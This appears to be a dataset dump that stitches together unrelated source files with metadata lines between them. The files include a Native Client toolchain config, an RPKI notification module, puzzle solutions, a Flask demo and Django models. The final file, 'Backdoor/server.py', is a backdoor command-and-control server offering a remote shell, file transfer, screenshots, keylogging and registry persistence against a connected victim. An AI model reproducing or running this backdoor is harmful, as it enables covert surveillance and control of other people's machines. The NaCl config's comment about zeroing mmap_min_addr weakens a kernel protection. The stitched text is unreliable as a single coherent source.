%(tmp)s.exe', ) ] TOOLCHAIN_CONFIGS['gcc_cs_arm_O0'] = ToolchainConfig( desc='codesourcery cross gcc [arm]', commands=COMMANDS_gcc_cs_arm, tools_needed=[GCC_CS_ARM, EMU_SCRIPT ], CC = GCC_CS_ARM, EMU_SCRIPT = EMU_SCRIPT, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['gcc_cs_arm_O9'] = ToolchainConfig( desc='codesourcery cross gcc [arm]', commands=COMMANDS_gcc_cs_arm, tools_needed=[GCC_CS_ARM, EMU_SCRIPT ], CC = GCC_CS_ARM, EMU_SCRIPT = EMU_SCRIPT, CFLAGS = '-O9 -static ' + GLOBAL_CFLAGS) ###################################################################### # # NACL + SEL_LDR [X86] ###################################################################### COMMANDS_nacl_gcc = [ ('compile', '%(CC)s %(src)s %(CFLAGS)s -o %(tmp)s.exe', ), ('sel_ldr', '%(SEL_LDR)s -f %(tmp)s.exe', ) ] TOOLCHAIN_CONFIGS['nacl_gcc_x8632_O0'] = ToolchainConfig( desc='nacl gcc [x86-32]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X32, SEL_LDR_X32], CC = NACL_GCC_X32, SEL_LDR = SEL_LDR_X32, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['nacl_gcc_x8632_O9'] = ToolchainConfig( desc='nacl gcc with optimizations [x86-32]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X32, SEL_LDR_X32], CC = NACL_GCC_X32, SEL_LDR = SEL_LDR_X32, CFLAGS = '-O9 -static') TOOLCHAIN_CONFIGS['nacl_gcc_x8664_O0'] = ToolchainConfig( desc='nacl gcc [x86-64]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X64, SEL_LDR_X64], CC = NACL_GCC_X64, SEL_LDR = SEL_LDR_X64, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['nacl_gcc_x8664_O9'] = ToolchainConfig( desc='nacl gcc with optimizations [x86-64]', commands=COMMANDS_nacl_gcc, tools_needed=[NACL_GCC_X64, SEL_LDR_X64], CC = NACL_GCC_X64, SEL_LDR = SEL_LDR_X64, CFLAGS = '-O9 -static ' + GLOBAL_CFLAGS) ###################################################################### # PNACL + SEL_LDR [ARM] ###################################################################### DRIVER_PATH = 'toolchain/linux_arm-untrusted/bin' PNACL_LLVM_GCC = DRIVER_PATH + '/pnacl-gcc' PNACL_BCLD = DRIVER_PATH + '/pnacl-bcld' PNACL_LIB_DIR = 'toolchain/linux_arm-untrusted/libs-bitcode/' COMMANDS_llvm_pnacl_arm = [ ('compile-bc', '%(CC)s %(src)s %(CFLAGS)s -c -o %(tmp)s.bc', ), ('translate-arm', '%(LD)s %(tmp)s.bc -o %(tmp)s.nexe -L%(LIB_DIR)s -lc -lnacl -lnosys', ), ('qemu-sel_ldr', '%(EMU)s run %(SEL_LDR)s -Q -d %(tmp)s.nexe', ) ] TOOLCHAIN_CONFIGS['llvm_pnacl_arm_O0'] = ToolchainConfig( desc='pnacl llvm [arm]', commands=COMMANDS_llvm_pnacl_arm, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, EMU_SCRIPT, SEL_LDR_ARM], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch arm', EMU = EMU_SCRIPT, SEL_LDR = SEL_LDR_ARM, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) TOOLCHAIN_CONFIGS['llvm_pnacl_arm_O9'] = ToolchainConfig( desc='pnacl llvm with optimizations [arm]', commands=COMMANDS_llvm_pnacl_arm, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, EMU_SCRIPT, SEL_LDR_ARM], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch arm', EMU = EMU_SCRIPT, SEL_LDR = SEL_LDR_ARM, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-09 -static ' + GLOBAL_CFLAGS) ###################################################################### # PNACL + SEL_LDR [X8632] ###################################################################### # NOTE: this is used for both x86 flavors COMMANDS_llvm_pnacl_x86_O0 = [ ('compile-bc', '%(CC)s %(src)s %(CFLAGS)s -c -o %(tmp)s.bc', ), ('translate-x8632', '%(LD)s %(tmp)s.bc -o %(tmp)s.nexe -L%(LIB_DIR)s', ), ('sel_ldr', '%(SEL_LDR)s %(tmp)s.nexe', ) ] TOOLCHAIN_CONFIGS['llvm_pnacl_x8632_O0'] = ToolchainConfig( desc='pnacl llvm [x8632]', commands=COMMANDS_llvm_pnacl_x86_O0, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, SEL_LDR_X32], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch x86-32', SEL_LDR = SEL_LDR_X32, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS) ###################################################################### # PNACL + SEL_LDR [X8664] ###################################################################### TOOLCHAIN_CONFIGS['llvm_pnacl_x8664_O0'] = ToolchainConfig( desc='pnacl llvm [x8664]', commands=COMMANDS_llvm_pnacl_x86_O0, tools_needed=[PNACL_LLVM_GCC, PNACL_BCLD, SEL_LDR_X64], CC = PNACL_LLVM_GCC + ' -emit-llvm', LD = PNACL_BCLD + ' -arch x86-64', SEL_LDR = SEL_LDR_X64, LIB_DIR = PNACL_LIB_DIR, CFLAGS = '-O0 -static ' + GLOBAL_CFLAGS)
de
0.721475
# Copyright 2008 The Native Client Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can # be found in the LICENSE file. # # Config file for various nacl compilation scenarios # ###################################################################### # ###################################################################### ###################################################################### # LOCAL GCC ###################################################################### ###################################################################### # CS ARM ###################################################################### # NOTE: you may need this if you see mmap: Permission denied # "echo 0 > /proc/sys/vm/mmap_min_addr" ###################################################################### # # NACL + SEL_LDR [X86] ###################################################################### ###################################################################### # PNACL + SEL_LDR [ARM] ###################################################################### ###################################################################### # PNACL + SEL_LDR [X8632] ###################################################################### # NOTE: this is used for both x86 flavors ###################################################################### # PNACL + SEL_LDR [X8664] ######################################################################
2.008743
2
fsl/models/torch/__init__.py
yanncalec/few-shot-learning-benchmark
0
6623632
"""PyTorch implementation. """ from .prototypical_networks import ProtoNet
"""PyTorch implementation. """ from .prototypical_networks import ProtoNet
en
0.5801
PyTorch implementation.
1.110532
1
app/enhanced_mapper/__init__.py
mappercore/mapper-core
1
6623633
<reponame>mappercore/mapper-core from .cover import * from .node import * from .oracle import * from .graph import * from .mapper import * # from .converter import * from .visualization import *
from .cover import * from .node import * from .oracle import * from .graph import * from .mapper import * # from .converter import * from .visualization import *
en
0.394251
# from .converter import *
0.937203
1
testbed_image/testbed_image.py
terop/env-logger
0
6623634
#!/usr/bin/env python3 """A script for downloading the current FMI Testbed image. Prints an empty string on failure and a filename where the latest Testbed image is stored on success.""" # See PIP requirements from testbed_image_requirements.txt import sys from datetime import datetime import requests from bs4 import BeautifulSoup import pytz def download_image(): """Downloads the latest FMI Testbed image. Returns the image data on success and None otherwise.""" timestamp = datetime.now().isoformat() try: resp = requests.get('http://testbed.fmi.fi/?imgtype=radar&t=5&n=1') # pylint: disable=invalid-name except requests.ConnectionError as ce: print('{}: Failed to access Testbed page: {}'.format(timestamp, ce), file=sys.stderr) return None if not resp.ok: return None # pylint: disable=invalid-name bs = BeautifulSoup(resp.text, 'lxml') images = bs.find_all(id='anim_image_anim_anim') if len(images) != 1: return None img_url = images[0]['src'] if img_url == '': return None try: resp = requests.get(img_url) # pylint: disable=invalid-name except requests.ConnectionError as ce: print('{}: Failed to download Testbed image: {}'.format(timestamp, ce), file=sys.stderr) return None return resp.content def main(): """Module main function.""" image = download_image() if not image: print('') return 1 helsinki = pytz.timezone('Europe/Helsinki') filename = 'testbed-{}.png'.format( helsinki.localize(datetime.now()).strftime('%Y-%m-%dT%H:%M%z')) with open(filename, 'wb') as tb_image: tb_image.write(image) print(filename) return 0 main()
#!/usr/bin/env python3 """A script for downloading the current FMI Testbed image. Prints an empty string on failure and a filename where the latest Testbed image is stored on success.""" # See PIP requirements from testbed_image_requirements.txt import sys from datetime import datetime import requests from bs4 import BeautifulSoup import pytz def download_image(): """Downloads the latest FMI Testbed image. Returns the image data on success and None otherwise.""" timestamp = datetime.now().isoformat() try: resp = requests.get('http://testbed.fmi.fi/?imgtype=radar&t=5&n=1') # pylint: disable=invalid-name except requests.ConnectionError as ce: print('{}: Failed to access Testbed page: {}'.format(timestamp, ce), file=sys.stderr) return None if not resp.ok: return None # pylint: disable=invalid-name bs = BeautifulSoup(resp.text, 'lxml') images = bs.find_all(id='anim_image_anim_anim') if len(images) != 1: return None img_url = images[0]['src'] if img_url == '': return None try: resp = requests.get(img_url) # pylint: disable=invalid-name except requests.ConnectionError as ce: print('{}: Failed to download Testbed image: {}'.format(timestamp, ce), file=sys.stderr) return None return resp.content def main(): """Module main function.""" image = download_image() if not image: print('') return 1 helsinki = pytz.timezone('Europe/Helsinki') filename = 'testbed-{}.png'.format( helsinki.localize(datetime.now()).strftime('%Y-%m-%dT%H:%M%z')) with open(filename, 'wb') as tb_image: tb_image.write(image) print(filename) return 0 main()
en
0.632281
#!/usr/bin/env python3 A script for downloading the current FMI Testbed image. Prints an empty string on failure and a filename where the latest Testbed image is stored on success. # See PIP requirements from testbed_image_requirements.txt Downloads the latest FMI Testbed image. Returns the image data on success and None otherwise. # pylint: disable=invalid-name # pylint: disable=invalid-name # pylint: disable=invalid-name Module main function.
2.716533
3
math/linereflection.py
mengyangbai/leetcode
0
6623635
class Solution: def isReflected(self, points): if (not points): return True dic = {} sumx = 0 lenwithoutdup = 0 for point in points: if point[1] not in dic: dic[point[1]] = {point[0]} sumx += point[0] lenwithoutdup += 1 else: if point[0] not in dic[point[1]]: dic[point[1]].add(point[0]) sumx += point[0] lenwithoutdup += 1 #print sumx, lenwithoutdup avgx = float(sumx)/lenwithoutdup for item in dic: lst = list(dic[item]) lst.sort() i, j = 0, len(lst)-1 # two pointers while i <= j: #print lst[i], avgx, lst[j] if lst[i] - avgx != avgx - lst[j]: return False i += 1 j -= 1 return True class betterSolution: def isReflected(self, points: [[int]]) -> bool: if not points: return True midx = (min(x for x, _ in points) + max(x for x, _ in points))/2 p = set(map(tuple, points)) return all((2 * midx-x, y) in p for x, y in points)
class Solution: def isReflected(self, points): if (not points): return True dic = {} sumx = 0 lenwithoutdup = 0 for point in points: if point[1] not in dic: dic[point[1]] = {point[0]} sumx += point[0] lenwithoutdup += 1 else: if point[0] not in dic[point[1]]: dic[point[1]].add(point[0]) sumx += point[0] lenwithoutdup += 1 #print sumx, lenwithoutdup avgx = float(sumx)/lenwithoutdup for item in dic: lst = list(dic[item]) lst.sort() i, j = 0, len(lst)-1 # two pointers while i <= j: #print lst[i], avgx, lst[j] if lst[i] - avgx != avgx - lst[j]: return False i += 1 j -= 1 return True class betterSolution: def isReflected(self, points: [[int]]) -> bool: if not points: return True midx = (min(x for x, _ in points) + max(x for x, _ in points))/2 p = set(map(tuple, points)) return all((2 * midx-x, y) in p for x, y in points)
en
0.269796
#print sumx, lenwithoutdup # two pointers #print lst[i], avgx, lst[j]
3.23208
3
irrd/rpki/notifications.py
mirceaulinic/irrd
94
6623636
import itertools import logging from collections import defaultdict from typing import Dict, List, Set from irrd.conf import get_setting from irrd.rpki.status import RPKIStatus from irrd.rpsl.parser import RPSLObject from irrd.rpsl.rpsl_objects import rpsl_object_from_text from irrd.storage.database_handler import DatabaseHandler from irrd.storage.queries import RPSLDatabaseQuery from irrd.utils.email import send_email logger = logging.getLogger(__name__) def notify_rpki_invalid_owners(database_handler: DatabaseHandler, rpsl_dicts_now_invalid: List[Dict[str, str]]) -> int: """ Notify the owners/contacts of newly RPKI invalid objects. Expects a list of objects, each a dict with their properties. Contacts are resolved as any mnt-nfy, or any email address on any tech-c or admin-c, of any maintainer of the object. One email is sent per email address. """ if not get_setting('rpki.notify_invalid_enabled'): return 0 rpsl_objs = [] for obj in rpsl_dicts_now_invalid: source = obj['source'] authoritative = get_setting(f'sources.{source}.authoritative') if authoritative and obj['rpki_status'] == RPKIStatus.invalid: rpsl_objs.append(rpsl_object_from_text(obj['object_text'])) if not rpsl_objs: return 0 sources = set([obj.parsed_data['source'] for obj in rpsl_objs]) mntner_emails_by_source = {} for source in sources: # For each source, a multi-step process is run to fill this # dict with the contact emails for each mntner. mntner_emails = defaultdict(set) # Step 1: retrieve all relevant maintainers from the DB mntner_pks = set(itertools.chain(*[ obj.parsed_data.get('mnt-by', []) for obj in rpsl_objs if obj.parsed_data['source'] == source ])) query = RPSLDatabaseQuery(['rpsl_pk', 'parsed_data']).sources([source]).rpsl_pks(mntner_pks).object_classes(['mntner']) mntners = list(database_handler.execute_query(query)) # Step 2: any mnt-nfy on these maintainers is a contact address for mntner in mntners: mntner_emails[mntner['rpsl_pk']].update(mntner['parsed_data'].get('mnt-nfy', [])) # Step 3: extract the contact handles for each maintainer mntner_contacts = { m['rpsl_pk']: m['parsed_data'].get('tech-c', []) + m['parsed_data'].get('admin-c', []) for m in mntners } # Step 4: retrieve all these contacts from the DB in bulk, # and extract their e-mail addresses contact_pks = set(itertools.chain(*mntner_contacts.values())) query = RPSLDatabaseQuery(['rpsl_pk', 'parsed_data']).sources([source]).rpsl_pks(contact_pks).object_classes(['role', 'person']) contacts = { r['rpsl_pk']: r['parsed_data'].get('e-mail', []) for r in database_handler.execute_query(query) } # Step 5: use the contacts per maintainer, and emails per contact # to create a flattened list of emails per maintainer for mntner_pk, mntner_contacts in mntner_contacts.items(): for contact_pk in mntner_contacts: try: mntner_emails[mntner_pk].update(contacts[contact_pk]) except KeyError: pass mntner_emails_by_source[source] = mntner_emails # With mntners_emails_by_source filled with per source, per maintainer, # all relevant emails, categorise the RPSL objects on which email # addresses they need to be sent to. objs_per_email: Dict[str, Set[RPSLObject]] = defaultdict(set) for rpsl_obj in rpsl_objs: mntners = rpsl_obj.parsed_data.get('mnt-by', []) source = rpsl_obj.parsed_data['source'] for mntner_pk in mntners: try: for email in mntner_emails_by_source[source][mntner_pk]: objs_per_email[email].add(rpsl_obj) except KeyError: # pragma: no cover pass header_template = get_setting('rpki.notify_invalid_header', '') subject_template = get_setting('rpki.notify_invalid_subject', '').replace('\n', ' ') for email, objs in objs_per_email.items(): sources_str = ', '.join(set([obj.parsed_data['source'] for obj in objs])) subject = subject_template.format(sources_str=sources_str, object_count=len(objs)) body = header_template.format(sources_str=sources_str, object_count=len(objs)) body += '\nThe following objects are affected:\n' body += '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n' for rpsl_obj in objs: body += rpsl_obj.render_rpsl_text() + '\n' body += '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' try: send_email(email, subject, body) except Exception as e: # pragma: no cover logger.warning(f'Unable to send RPKI invalid notification to {email}: {e}') return len(objs_per_email.keys())
import itertools import logging from collections import defaultdict from typing import Dict, List, Set from irrd.conf import get_setting from irrd.rpki.status import RPKIStatus from irrd.rpsl.parser import RPSLObject from irrd.rpsl.rpsl_objects import rpsl_object_from_text from irrd.storage.database_handler import DatabaseHandler from irrd.storage.queries import RPSLDatabaseQuery from irrd.utils.email import send_email logger = logging.getLogger(__name__) def notify_rpki_invalid_owners(database_handler: DatabaseHandler, rpsl_dicts_now_invalid: List[Dict[str, str]]) -> int: """ Notify the owners/contacts of newly RPKI invalid objects. Expects a list of objects, each a dict with their properties. Contacts are resolved as any mnt-nfy, or any email address on any tech-c or admin-c, of any maintainer of the object. One email is sent per email address. """ if not get_setting('rpki.notify_invalid_enabled'): return 0 rpsl_objs = [] for obj in rpsl_dicts_now_invalid: source = obj['source'] authoritative = get_setting(f'sources.{source}.authoritative') if authoritative and obj['rpki_status'] == RPKIStatus.invalid: rpsl_objs.append(rpsl_object_from_text(obj['object_text'])) if not rpsl_objs: return 0 sources = set([obj.parsed_data['source'] for obj in rpsl_objs]) mntner_emails_by_source = {} for source in sources: # For each source, a multi-step process is run to fill this # dict with the contact emails for each mntner. mntner_emails = defaultdict(set) # Step 1: retrieve all relevant maintainers from the DB mntner_pks = set(itertools.chain(*[ obj.parsed_data.get('mnt-by', []) for obj in rpsl_objs if obj.parsed_data['source'] == source ])) query = RPSLDatabaseQuery(['rpsl_pk', 'parsed_data']).sources([source]).rpsl_pks(mntner_pks).object_classes(['mntner']) mntners = list(database_handler.execute_query(query)) # Step 2: any mnt-nfy on these maintainers is a contact address for mntner in mntners: mntner_emails[mntner['rpsl_pk']].update(mntner['parsed_data'].get('mnt-nfy', [])) # Step 3: extract the contact handles for each maintainer mntner_contacts = { m['rpsl_pk']: m['parsed_data'].get('tech-c', []) + m['parsed_data'].get('admin-c', []) for m in mntners } # Step 4: retrieve all these contacts from the DB in bulk, # and extract their e-mail addresses contact_pks = set(itertools.chain(*mntner_contacts.values())) query = RPSLDatabaseQuery(['rpsl_pk', 'parsed_data']).sources([source]).rpsl_pks(contact_pks).object_classes(['role', 'person']) contacts = { r['rpsl_pk']: r['parsed_data'].get('e-mail', []) for r in database_handler.execute_query(query) } # Step 5: use the contacts per maintainer, and emails per contact # to create a flattened list of emails per maintainer for mntner_pk, mntner_contacts in mntner_contacts.items(): for contact_pk in mntner_contacts: try: mntner_emails[mntner_pk].update(contacts[contact_pk]) except KeyError: pass mntner_emails_by_source[source] = mntner_emails # With mntners_emails_by_source filled with per source, per maintainer, # all relevant emails, categorise the RPSL objects on which email # addresses they need to be sent to. objs_per_email: Dict[str, Set[RPSLObject]] = defaultdict(set) for rpsl_obj in rpsl_objs: mntners = rpsl_obj.parsed_data.get('mnt-by', []) source = rpsl_obj.parsed_data['source'] for mntner_pk in mntners: try: for email in mntner_emails_by_source[source][mntner_pk]: objs_per_email[email].add(rpsl_obj) except KeyError: # pragma: no cover pass header_template = get_setting('rpki.notify_invalid_header', '') subject_template = get_setting('rpki.notify_invalid_subject', '').replace('\n', ' ') for email, objs in objs_per_email.items(): sources_str = ', '.join(set([obj.parsed_data['source'] for obj in objs])) subject = subject_template.format(sources_str=sources_str, object_count=len(objs)) body = header_template.format(sources_str=sources_str, object_count=len(objs)) body += '\nThe following objects are affected:\n' body += '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n' for rpsl_obj in objs: body += rpsl_obj.render_rpsl_text() + '\n' body += '~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~' try: send_email(email, subject, body) except Exception as e: # pragma: no cover logger.warning(f'Unable to send RPKI invalid notification to {email}: {e}') return len(objs_per_email.keys())
en
0.855802
Notify the owners/contacts of newly RPKI invalid objects. Expects a list of objects, each a dict with their properties. Contacts are resolved as any mnt-nfy, or any email address on any tech-c or admin-c, of any maintainer of the object. One email is sent per email address. # For each source, a multi-step process is run to fill this # dict with the contact emails for each mntner. # Step 1: retrieve all relevant maintainers from the DB # Step 2: any mnt-nfy on these maintainers is a contact address # Step 3: extract the contact handles for each maintainer # Step 4: retrieve all these contacts from the DB in bulk, # and extract their e-mail addresses # Step 5: use the contacts per maintainer, and emails per contact # to create a flattened list of emails per maintainer # With mntners_emails_by_source filled with per source, per maintainer, # all relevant emails, categorise the RPSL objects on which email # addresses they need to be sent to. # pragma: no cover # pragma: no cover
2.382303
2
Python/Ex028.py
renato-rt/Python
0
6623637
<gh_stars>0 from time import sleep from random import randint print('\033[1;34;47m-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\033[m') print('Vou pensar em um número entre 0 e 5. Tente advinhar...') print('\033[1;34;47m-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\033[m') user = int(input('Em qual número estou pensando? ')) print('Processando...') sleep(1) lista = randint(0, 5) if user == lista: print('Parabéns você acertou!!!') else: print('Lamento, eu pensei no número {}, tente outra vez.'.format(lista))
from time import sleep from random import randint print('\033[1;34;47m-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\033[m') print('Vou pensar em um número entre 0 e 5. Tente advinhar...') print('\033[1;34;47m-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\033[m') user = int(input('Em qual número estou pensando? ')) print('Processando...') sleep(1) lista = randint(0, 5) if user == lista: print('Parabéns você acertou!!!') else: print('Lamento, eu pensei no número {}, tente outra vez.'.format(lista))
none
1
3.683389
4
src/day10_mp.py
dev-mbusch/adventofcode2020
0
6623638
<reponame>dev-mbusch/adventofcode2020 with open("input_files\day10_input_mp.txt") as file: input = [int(value) for value in file.read().split("\n")] # input = '''28 # 33 # 18 # 42 # 31 # 14 # 46 # 20 # 48 # 47 # 24 # 23 # 49 # 45 # 19 # 38 # 39 # 11 # 1 # 32 # 25 # 35 # 8 # 17 # 7 # 9 # 4 # 2 # 34 # 10 # 3''' # input = input.split("\n") # input = [int(value) for value in input] # print(input) input.sort() jolt_differences = [-1*(input[count-1] - jolt) for count, jolt in enumerate(input)] # add charging outlet jolt_differences[0] = input[0] # add device's built in adapter jolt_differences.append(3) print("Solution part 1: ", jolt_differences.count(1) * jolt_differences.count(3)) # Part 2 # cut list into sublists with only 1 step jolt differences subsequences = [] start = 0 end = int() for count, difference in enumerate(jolt_differences): if difference == 3: end = count subsequences.append(jolt_differences[start:end]) start = end # number of combinations matches fibonacci sequence def tribonacci(signature, n): res = signature[:n] for i in range(n - 3): res.append(sum(res[-3:])) return res count_ones = [] for subsequence in subsequences: count_ones.append(subsequence.count(1)) solution2 = 1 for value in count_ones: if value > 0: solution2 *= max(tribonacci([0,0,1], value + 3)) print("Solution part 2: ", solution2)
with open("input_files\day10_input_mp.txt") as file: input = [int(value) for value in file.read().split("\n")] # input = '''28 # 33 # 18 # 42 # 31 # 14 # 46 # 20 # 48 # 47 # 24 # 23 # 49 # 45 # 19 # 38 # 39 # 11 # 1 # 32 # 25 # 35 # 8 # 17 # 7 # 9 # 4 # 2 # 34 # 10 # 3''' # input = input.split("\n") # input = [int(value) for value in input] # print(input) input.sort() jolt_differences = [-1*(input[count-1] - jolt) for count, jolt in enumerate(input)] # add charging outlet jolt_differences[0] = input[0] # add device's built in adapter jolt_differences.append(3) print("Solution part 1: ", jolt_differences.count(1) * jolt_differences.count(3)) # Part 2 # cut list into sublists with only 1 step jolt differences subsequences = [] start = 0 end = int() for count, difference in enumerate(jolt_differences): if difference == 3: end = count subsequences.append(jolt_differences[start:end]) start = end # number of combinations matches fibonacci sequence def tribonacci(signature, n): res = signature[:n] for i in range(n - 3): res.append(sum(res[-3:])) return res count_ones = [] for subsequence in subsequences: count_ones.append(subsequence.count(1)) solution2 = 1 for value in count_ones: if value > 0: solution2 *= max(tribonacci([0,0,1], value + 3)) print("Solution part 2: ", solution2)
en
0.528251
# input = '''28 # 33 # 18 # 42 # 31 # 14 # 46 # 20 # 48 # 47 # 24 # 23 # 49 # 45 # 19 # 38 # 39 # 11 # 1 # 32 # 25 # 35 # 8 # 17 # 7 # 9 # 4 # 2 # 34 # 10 # 3''' # input = input.split("\n") # input = [int(value) for value in input] # print(input) # add charging outlet # add device's built in adapter # Part 2 # cut list into sublists with only 1 step jolt differences # number of combinations matches fibonacci sequence
3.358563
3
app.py
jhanley-com/google-cloud-run-getting-started-python-flask
5
6623639
<reponame>jhanley-com/google-cloud-run-getting-started-python-flask<filename>app.py import os import logging from flask import Flask # Change the format of messages logged to Stackdriver logging.basicConfig(format='%(message)s', level=logging.INFO) app = Flask(__name__) @app.route('/') def home(): html = """ <html> <head> <title> Google Cloud Run - Sample Python Flask Example </title> </head> <body> <p>Hello Google Cloud Run World!</p> <a href="https://cloud.google.com/run/" target="_blank">Google Cloud Run Website</a> </body> </html> """ return html if __name__ == '__main__': app.run(debug=True, host='0.0.0.0', port=int(os.environ.get('PORT', 8080)))
import os import logging from flask import Flask # Change the format of messages logged to Stackdriver logging.basicConfig(format='%(message)s', level=logging.INFO) app = Flask(__name__) @app.route('/') def home(): html = """ <html> <head> <title> Google Cloud Run - Sample Python Flask Example </title> </head> <body> <p>Hello Google Cloud Run World!</p> <a href="https://cloud.google.com/run/" target="_blank">Google Cloud Run Website</a> </body> </html> """ return html if __name__ == '__main__': app.run(debug=True, host='0.0.0.0', port=int(os.environ.get('PORT', 8080)))
en
0.301468
# Change the format of messages logged to Stackdriver <html> <head> <title> Google Cloud Run - Sample Python Flask Example </title> </head> <body> <p>Hello Google Cloud Run World!</p> <a href="https://cloud.google.com/run/" target="_blank">Google Cloud Run Website</a> </body> </html>
2.683525
3
tests/test_OcsGenericEntityCli.py
lsst-ts/ts_ocs_sequencer
0
6623640
#!/usr/bin/env python # -*- coding: utf-8 -*- # + # import(s) # - from OcsGenericEntityCli import * # + # + # __doc__ string # _ __doc__ = """test of OcsGenericEntityCli""" # + # function: test_cli() # - def test_cli(): cli = None try: cli = OcsGenericEntityCli() except OcsGenericEntityException: pass if cli: assert True else: assert False # + # function: test_parse_cli() # - def test_parse_cli(): cli = None try: cli = OcsGenericEntityCli() cli.execute() except OcsGenericEntityException as f: print(f.errstr) if cli: assert True else: assert False
#!/usr/bin/env python # -*- coding: utf-8 -*- # + # import(s) # - from OcsGenericEntityCli import * # + # + # __doc__ string # _ __doc__ = """test of OcsGenericEntityCli""" # + # function: test_cli() # - def test_cli(): cli = None try: cli = OcsGenericEntityCli() except OcsGenericEntityException: pass if cli: assert True else: assert False # + # function: test_parse_cli() # - def test_parse_cli(): cli = None try: cli = OcsGenericEntityCli() cli.execute() except OcsGenericEntityException as f: print(f.errstr) if cli: assert True else: assert False
en
0.260135
#!/usr/bin/env python # -*- coding: utf-8 -*- # + # import(s) # - # + # + # __doc__ string # _ test of OcsGenericEntityCli # + # function: test_cli() # - # + # function: test_parse_cli() # -
2.265396
2
signals/signals/apps/related/models.py
gonzaloamadio/django-signals2
0
6623641
from django.conf import settings from django.db import models from django.utils.translation import ugettext_lazy as _ class RelatedModel(models.Model): """ Abstract model with basic info """ title = models.CharField(max_length=128, db_index=True, verbose_name='Name') company = models.ForeignKey('entities.Company', on_delete=models.SET_NULL, verbose_name="Company", null=True, blank=True) class Meta: abstract = True def __str__(self): return self.title class Job(RelatedModel): """ Proposals of jobs Now we are not adding any new field. But we leave it open """ class Meta: verbose_name_plural = 'jobs'
from django.conf import settings from django.db import models from django.utils.translation import ugettext_lazy as _ class RelatedModel(models.Model): """ Abstract model with basic info """ title = models.CharField(max_length=128, db_index=True, verbose_name='Name') company = models.ForeignKey('entities.Company', on_delete=models.SET_NULL, verbose_name="Company", null=True, blank=True) class Meta: abstract = True def __str__(self): return self.title class Job(RelatedModel): """ Proposals of jobs Now we are not adding any new field. But we leave it open """ class Meta: verbose_name_plural = 'jobs'
en
0.837208
Abstract model with basic info Proposals of jobs Now we are not adding any new field. But we leave it open
2.38551
2
Backdoor/server.py
Cyzerx/Penetration-testing-with-Python3
0
6623642
<filename>Backdoor/server.py<gh_stars>0 import socket import termcolor import json import os def reliable_recv(): data = '' while True: try: data = data + target.recv(1024).decode().rstrip() return json.loads(data) except ValueError: continue def reliable_send(data): jsondata = json.dumps(data) target.send(jsondata.encode()) def upload_file(file_name): f = open(file_name, 'rb') target.send(f.read()) def download_file(file_name): f = open(file_name, 'wb') target.settimeout(1) chunk = target.recv(1024) while chunk: f.write(chunk) try: chunk = target.recv(1024) except socket.timeout as e: break target.settimeout(None) f.close() def target_communication(): count = 0 while True: command = input('* Shell~%s: ' % str(ip)) reliable_send(command) if command == 'quit': break elif command == 'clear': os.system('clear') elif command[:3] == 'cd ': pass elif command[:6] == 'upload': upload_file(command[7:]) elif command[:8] == 'download': download_file(command[9:]) elif command[:10] == 'screenshot': f = open('screenshot%d' % (count), 'wb') target.settimeout(3) chunk = target.recv(1024) while chunk: f.write(chunk) try: chunk = target.recv(1024) except socket.timeout as e: break target.settimeout(None) f.close() count += 1 elif command == 'help': print(termcolor.colored('''\n quit --> Quit session with the Target clear --> Clear the Screen cd *Directory Name* --> Changes directory on target system upload *File Name* --> Upload file to the target machine download *File Name* --> Download file from target machine keylog_start --> Start the KeyLogger keylog_dump --> Print KeyStrokes that the target inputted keylog_stop --> Stop and self destruct KeyLogger file presistence *RegName* *FileName* --> Create Persistence in registry (starting automatically on startup)'''),'green') else: result = reliable_recv() print(result) sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #IPv4 and TCP connection sock.bind(('127.0.0.1', 5555)) print(termcolor.colored('[+] Listening for the incoming Connections', 'green')) sock.listen(5) target, ip = sock.accept() print(termcolor.colored('[+] Target connected from: ' + str(ip), 'green')) target_communication()
